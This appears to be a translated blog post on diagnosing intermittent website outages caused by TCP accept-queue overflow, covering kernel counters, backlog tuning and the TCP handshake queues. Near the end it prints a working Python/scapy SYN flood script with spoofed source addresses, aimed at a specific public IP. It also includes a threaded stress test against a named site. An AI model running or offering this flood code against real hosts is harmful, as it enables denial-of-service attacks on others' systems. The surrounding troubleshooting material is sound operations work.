Python Chinese Community The spiritual tribe of Python Chinese developers around the world
Author: Liu Xiaoming, head of operations technology at an Internet company, with 10 years of experience in Internet development and operations. He has long been committed to developing operations tools and promoting expert operations services, empowering development and improving efficiency.
* * * *
Problem Description:
1. The monitoring system found that the home page and other pages of the e-commerce website were intermittently inaccessible.
2. Checks showed that security protection, network traffic, and application system load were all normal.
3. Restarting the system solved the problem temporarily, but the intermittent failures returned after a while.
By this point the problem was affecting normal business across the entire website. I was scared: the main alerting system had raised no alarm, every service appeared to be running normally, and I broke out in a cold sweat. Still, I had to stay calm, look carefully for clues, and track down the problem step by step.
Preliminary judgment of the problem:
1. Check for errors and drops at the device and NIC layers
cat /proc/net/dev and ifconfig: no exception was found at the hardware and system layers.
2. Check the socket overflow and socket dropped counters. The overflow counter grows when the accept queue overflows; the dropped counter grows when the SYN queue overflows.
netstat -s | grep -i listen showed the socket overflow and socket dropped counters increasing sharply.
3. Check the sysctl kernel parameters backlog, somaxconn, and file-max, and the application's backlog
In the ss -lnt output, Send-Q of a listening socket is the minimum of the parameters above. The queue length (Recv-Q) on ports 80 and 443 exceeded that default limit.
4. Check whether SELinux and NetworkManager are enabled; both should be disabled
5. Check whether tcp_timestamps and tcp_tw_reuse are enabled. Behind NAT, tcp_tw_recycle must be disabled
6. Capture packets to determine whether requests reach the application and whether any SYN goes unanswered.
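The overflow and drop counters checked above can also be read directly from the kernel. The following is a minimal sketch, assuming a Linux host where `/proc/net/netstat` exposes the `TcpExt` fields `ListenOverflows` and `ListenDrops` (the counters behind the two `netstat -s` lines). The helper names and the sample text are illustrative and were not part of the original troubleshooting session.

```python
def parse_proc_netstat(text):
    """Parse /proc/net/netstat-style text into {protocol: {field: value}}."""
    lines = [line.split() for line in text.strip().splitlines() if line.strip()]
    stats = {}
    # The file comes in pairs: a line of field names, then a line of values.
    for names, values in zip(lines[0::2], lines[1::2]):
        proto = names[0].rstrip(':')
        stats[proto] = dict(zip(names[1:], map(int, values[1:])))
    return stats


def listen_queue_counters(text):
    """Return (ListenOverflows, ListenDrops), defaulting to 0 if absent."""
    tcp_ext = parse_proc_netstat(text).get('TcpExt', {})
    return tcp_ext.get('ListenOverflows', 0), tcp_ext.get('ListenDrops', 0)


# Shortened, made-up sample; a real file has many more TcpExt fields.
SAMPLE = """\
TcpExt: SyncookiesSent SyncookiesRecv ListenOverflows ListenDrops
TcpExt: 0 0 3518 3520
"""

if __name__ == '__main__':
    try:
        with open('/proc/net/netstat') as f:
            text = f.read()
    except OSError:
        text = SAMPLE  # not on Linux: fall back to the sample text
    overflows, drops = listen_queue_counters(text)
    print('ListenOverflows:', overflows, 'ListenDrops:', drops)
```

Sampling these two values a few seconds apart and comparing them shows whether the queues are overflowing right now, rather than at some point since boot.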
In-depth analysis of the problem:
Normal three-way TCP connection handshake:
- Step 1: The client sends a SYN to the server to initiate a handshake.
- Step 2: The server replies with SYN + ACK to the client.
- Step 3: After receiving a SYN + ACK, the client replies with an ACK indicating that it has received a SYN + ACK from the server.
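The handshake is completed by the kernel, not by the application. The sketch below illustrates this on the loopback interface: `connect()` returns before the server ever calls `accept()`, because the established connection simply waits in a queue. The function name, the backlog of 5, and the 5-second timeouts are arbitrary choices for illustration.

```python
import socket


def handshake_without_accept():
    """Connect on loopback, then accept; return (peer seen by server, client address)."""
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        server.bind(('127.0.0.1', 0))  # port 0: let the OS pick a free port
        server.listen(5)               # backlog of 5 is an arbitrary choice
        client.settimeout(5)
        # connect() returns once the three-way handshake is done, even though
        # the server application has not called accept() yet.
        client.connect(server.getsockname())
        local = client.getsockname()
        # accept() only takes the already-established connection off the queue.
        server.settimeout(5)
        conn, peer = server.accept()
        conn.close()
        return peer, local
    finally:
        client.close()
        server.close()


if __name__ == '__main__':
    peer, local = handshake_without_accept()
    print('server saw peer', peer, 'client address was', local)
```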
The accept queue was full while TCP connections were being established. Going back to the handshake diagram, and with the overflow counters climbing faster and faster, it was clear that the full-connection queue on the server must have overflowed.
Then check how the OS handles the overflow:
# cat /proc/sys/net/ipv4/tcp_abort_on_overflow
0
tcp_abort_on_overflow set to 0 means that if the full-connection queue is full at step 3 of the three-way handshake, the server discards the ACK sent by the client.
To prove that the exceptions seen by the client application were related to the full-connection queue, I changed tcp_abort_on_overflow to 1. A value of 1 means that in step 3, if the full-connection queue is full, the server sends a reset packet to the client, abandoning the handshake and the connection (which was never established on the server side).
I then tested again and saw many "connection reset by peer" errors in the web service's exception log, which proved that the client errors were caused by this.
Across the sysctl kernel parameters (backlog, somaxconn, file-max) and the nginx backlog, ss -ln shows the minimum value, 128, as Send-Q. Recv-Q was 129, so requests were being discarded. The parameters above were modified and optimized as follows:
- Linux kernel parameter optimization:
net.ipv4.tcp_syncookies = 1
net.ipv4.tcp_max_syn_backlog = 16384
net.core.somaxconn = 16384
- Application (nginx) listen backlog: backlog=32768;
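On Linux, the accept-queue limit of a listening socket is the smaller of the backlog passed to `listen()` and `net.core.somaxconn`. With the values above, an application backlog of 32768 is therefore still capped at 16384. The sketch below computes that limit and flags listening sockets whose Recv-Q has passed their Send-Q in `ss -lnt` output. The sample text is made up to mirror the 129/128 case described earlier, and the function names are illustrative.

```python
def effective_backlog(app_backlog, somaxconn):
    """Accept-queue limit actually applied by the kernel."""
    return min(app_backlog, somaxconn)


def parse_ss_listen(text):
    """Parse `ss -lnt` output into a list of dicts, one per LISTEN socket."""
    rows = []
    for line in text.strip().splitlines():
        fields = line.split()
        if not fields or fields[0] != 'LISTEN':
            continue  # skips the header line and blank lines
        recv_q, send_q, local = int(fields[1]), int(fields[2]), fields[3]
        port = int(local.rsplit(':', 1)[1])
        rows.append({
            'port': port,
            'recv_q': recv_q,            # connections waiting for accept()
            'send_q': send_q,            # accept-queue limit
            'full': recv_q > send_q,     # queue has passed its limit
        })
    return rows


# Made-up sample mirroring the situation described in the text.
SS_SAMPLE = """\
State   Recv-Q  Send-Q  Local Address:Port  Peer Address:Port
LISTEN  129     128     *:80                *:*
LISTEN  0       128     *:443               *:*
"""

if __name__ == '__main__':
    for row in parse_ss_listen(SS_SAMPLE):
        print(row)
    print('limit after tuning:', effective_backlog(32768, 16384))
```

Raising only the application backlog or only `somaxconn` has no effect on its own, because the smaller of the two always wins.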
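A multithreaded stress test in Python found no new problems:
from concurrent.futures import ThreadPoolExecutor, as_completed
from urllib.parse import urljoin

import requests
from bs4 import BeautifulSoup

url = 'https://www.wuage.com/'
response = requests.get(url, timeout=10)
soup = BeautifulSoup(response.text, 'html.parser')

# Fetch every link on the home page concurrently with 20 worker threads.
with ThreadPoolExecutor(20) as ex:
    futures = [
        # urljoin resolves relative hrefs against the home page URL
        ex.submit(requests.get, urljoin(url, each_a_tag['href']), timeout=10)
        for each_a_tag in soup.find_all('a', href=True)
    ]
    for future in as_completed(futures):
        try:
            future.result()  # re-raises any exception from the worker thread
        except Exception as err:
            print('return error msg:' + str(err))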
Understanding the flow and the queues involved in establishing a connection during the TCP handshake
As shown in the figure above, there are two queues: the SYN queue (half-connection queue) and the accept queue (full-connection queue).
In the three-way handshake, after the server receives a SYN from the client, it puts the connection information into the half-connection queue and replies with a SYN+ACK (step 2).
A SYN flood attack, for example, targets the half-connection queue. The attacker keeps opening connections but only performs the first step. In the second step, the attacker deliberately discards the SYN+ACK from the server and does nothing further, so the queue on the server fills up and other, normal requests cannot get in.
In the third step, the server receives the ACK from the client. If the full-connection queue is not full, the server takes the connection information out of the half-connection queue and puts it into the full-connection queue. Otherwise, the server acts according to tcp_abort_on_overflow.
If the full-connection queue is full and tcp_abort_on_overflow is 0, the server resends the SYN+ACK to the client after a certain period of time. If the client's timeout is short, the client is likely to see an exception.
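The server-side decision at step 3 can be sketched as a toy model. This is a deliberate simplification for illustration and not the kernel's implementation: it ignores SYN queue limits, retransmission timers, and the exact fullness check the kernel uses. The class and method names are hypothetical.

```python
from collections import deque


class ListenSocketModel:
    """Toy model of the half-connection and full-connection queues."""

    def __init__(self, accept_limit, abort_on_overflow=0):
        self.accept_limit = accept_limit
        self.abort_on_overflow = abort_on_overflow
        self.syn_queue = set()       # half-open connections (SYN received)
        self.accept_queue = deque()  # established, waiting for accept()

    def on_syn(self, client):
        """Steps 1 and 2: remember the client and answer with SYN+ACK."""
        self.syn_queue.add(client)
        return 'SYN+ACK'

    def on_ack(self, client):
        """Step 3: promote the connection, drop the ACK, or reset."""
        if client not in self.syn_queue:
            return 'ignored'
        if len(self.accept_queue) >= self.accept_limit:
            if self.abort_on_overflow:
                self.syn_queue.discard(client)
                return 'RST'
            # The entry stays half-open; the SYN+ACK would be resent later.
            return 'ACK dropped'
        self.syn_queue.discard(client)
        self.accept_queue.append(client)
        return 'established'

    def accept(self):
        """Application takes one established connection off the queue."""
        return self.accept_queue.popleft() if self.accept_queue else None


if __name__ == '__main__':
    server = ListenSocketModel(accept_limit=1)
    for name in ('a', 'b'):
        server.on_syn(name)
    print(server.on_ack('a'))  # queue has room
    print(server.on_ack('b'))  # queue is full, abort_on_overflow is 0
```

In this model, a client whose ACK was dropped can still complete the handshake once the application calls `accept()` and frees a slot, which matches the retry behaviour described above for the value 0.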
SYN flood attacks
The SYN flood is one of the most popular forms of DoS (denial of service) and DDoS (distributed denial of service) attack. It exploits a weakness in TCP: the attacked server ends up holding a large number of half-open connections in the SYN_RECV state and, by default, retries the second handshake packet five times for each of them, which fills the TCP wait queue. The resulting resource exhaustion (CPU fully loaded or memory insufficient) prevents normal business requests from connecting.
A SYN flood attack in Python:
import random
from concurrent.futures import ThreadPoolExecutor

from scapy.all import IP, TCP, send


def synFlood(tgt, dPort):
    # Spoofed source addresses; each SYN picks one at random
    srcList = ['11.1.1.2', '22.1.1.102', '33.1.1.2', '125.130.5.199']
    for sPort in range(1024, 65535):
        index = random.randrange(4)
        ipLayer = IP(src=srcList[index], dst=tgt)
        tcpLayer = TCP(sport=sPort, dport=dPort, flags='S')  # SYN flag only
        packet = ipLayer / tcpLayer
        send(packet)


tgt = '139.196.251.198'  # target host (only test hosts you are authorized to test)
print(tgt)
dPort = 443

with ThreadPoolExecutor(10000000) as ex:
    try:
        # Pass the callable and its arguments separately; calling
        # synFlood(tgt, dPort) here would run it in the main thread.
        ex.submit(synFlood, tgt, dPort).result()
    except Exception as err:
        print('return error msg:' + str(err))
Problems with the TCP half-connection and full-connection queues are easy to overlook, yet these queues are critical, especially for short-connection applications, where such problems break out more readily. When they do, network traffic, CPU, threads, and load all look normal; RT looks high from the client side, while the server-side logs show a short RT. To avoid scrambling when a problem hits, establish an emergency response mechanism. I hope to write an article on emergency response when I get the chance.